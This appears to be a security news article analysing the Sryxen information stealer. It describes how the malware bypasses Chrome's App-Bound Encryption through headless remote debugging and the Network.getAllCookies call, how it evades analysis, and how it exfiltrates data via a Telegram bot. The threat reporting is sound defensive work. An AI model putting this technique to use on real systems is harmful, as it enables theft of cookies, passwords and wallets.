Sryxen Stealer: The New Malware Bypassing Chrome’s App-Bound Encryption
A new malware named Sryxen has surfaced, posing a significant threat to Windows users by targeting sensitive browser data. This C++-based information stealer is sold as Malware-as-a-Service (MaaS) and is designed to quickly harvest credentials without establishing persistence on infected systems.
Innovative Bypass of Chrome’s App-Bound Encryption
Google introduced App-Bound Encryption in Chrome version 127 to enhance the security of cookies and other sensitive data. Sryxen circumvents this protection by launching Chrome in headless mode—a mode that runs the browser without a graphical user interface. It then utilizes Chrome’s DevTools Protocol to request decrypted cookie data directly from the browser. This method effectively sidesteps the encryption without the need to decrypt data stored on disk.
Technical Execution
Upon execution, Sryxen terminates any active Chrome processes and relaunches the browser with specific command-line arguments:
– `–headless`
– `–remote-debugging-port`
– `–user-data-dir`
These parameters enable remote debugging capabilities without displaying any visible windows. Sryxen then connects to the debugging port via WebSocket and sends a DevTools Protocol command (`Network.getAllCookies`) to retrieve all cookies. Chrome processes this request internally, decrypting the cookies using its own App-Bound Encryption key and returning the plaintext data to the stealer. Since the decrypted cookies never touch the disk, file-based monitoring tools are rendered ineffective.
Evasion Techniques
Sryxen employs multiple layers of protection to avoid detection and analysis:
– Code Encryption: Utilizes Vectored Exception Handling-based code encryption, keeping its main payload encrypted at rest and only decrypting it during execution through exception handling mechanisms. This technique complicates static analysis, as the malicious code appears as garbage data when examined without running it.
– Anti-Debugging Measures: Implements six separate anti-debug checks, including NtGlobalFlag inspection and PEB analysis, terminating execution if debugging tools are detected.
Data Exfiltration
After harvesting browser information, passwords, and cryptocurrency wallet data, Sryxen compresses the collected data into an archive. It then uploads this archive to a Telegram bot controlled by the attackers using curl commands executed through PowerShell.
Implications and Recommendations
The emergence of Sryxen underscores the evolving sophistication of malware designed to bypass advanced security measures. Users and organizations are advised to:
– Keep Software Updated: Regularly update browsers and operating systems to benefit from the latest security patches.
– Exercise Caution: Be vigilant when downloading and installing software, especially from unverified sources.
– Implement Security Solutions: Utilize comprehensive security solutions that can detect and mitigate such threats.
By staying informed and adopting proactive security measures, users can better protect themselves against threats like Sryxen.
